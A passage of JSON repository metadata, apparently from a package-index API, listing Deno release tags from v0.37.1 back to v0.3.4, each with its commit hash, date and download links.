ithub.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_u